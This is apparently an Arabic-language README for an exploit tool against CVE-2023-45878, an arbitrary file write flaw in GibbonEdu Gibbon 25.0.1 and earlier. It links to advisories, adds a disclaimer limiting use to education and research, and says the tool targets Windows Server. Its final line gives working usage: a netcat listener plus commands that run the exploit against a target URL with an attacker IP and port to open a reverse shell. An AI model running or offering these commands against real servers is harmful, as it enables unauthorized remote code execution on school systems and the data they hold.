
CVE-2023-45878 استغلال سهل | شل عكسي
يتيح GibbonEdu Gibbon الإصدار 25.0.1 وما قبله كتابة ملفات تعسفية (Arbitrary File Write)
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
تم توفير هذا الاستغلال لأغراض تعليمية وبحثية فقط. الاستخدام غير المصرح به لهذا الكود ضد الأنظمة دون إذن صريح غير قانوني وقد ينتهك قوانين الجرائم الإلكترونية في مختلف الولايات القضائية. لا أتحمل أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال.
تقع على عاتق المستخدم مسؤولية ضمان الامتثال لجميع القوانين المعمول بها والمبادئ التوجيهية الأخلاقية قبل تنفيذ هذا الكود. لا تستخدم هذا الاستغلال في أنشطة ضارة.
يعمل هذا الاستغلال حصرياً على Windows Server. إذا كان الإصدار المعرض للخطر من Gibbon يعمل على خادم Linux، فستحتاج إلى تعديل الاستغلال وفقاً لذلك.
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> أو ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>